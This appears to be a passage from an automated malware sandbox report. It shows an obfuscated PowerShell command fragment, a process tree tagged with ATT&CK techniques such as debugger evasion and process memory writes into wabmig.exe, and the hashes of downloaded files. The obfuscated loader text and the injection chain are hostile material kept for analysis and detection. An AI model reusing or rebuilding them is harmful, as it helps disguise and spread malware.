Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfasciated.Hol && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:5096
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4284
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
470KB
MD598074e97335a66b5889ef02ae6a4cb15
SHA12bcb63391d386eea8c04aa7d2421d6931a1aeb4b
SHA2566be3ea2cf58c974a4775ac67d8e2bc601c24ad7d5fb4a33fc0451fc7fffa64fb
SHA5122526aa62c56ddb62b03e7c897d2ba9eb17b15d21dca1b4dacc8f025ecbbb3e59803975dd5c0f4c1a957d5a7ba8226945ffed7028bad0578405c7c55ecb4eb12c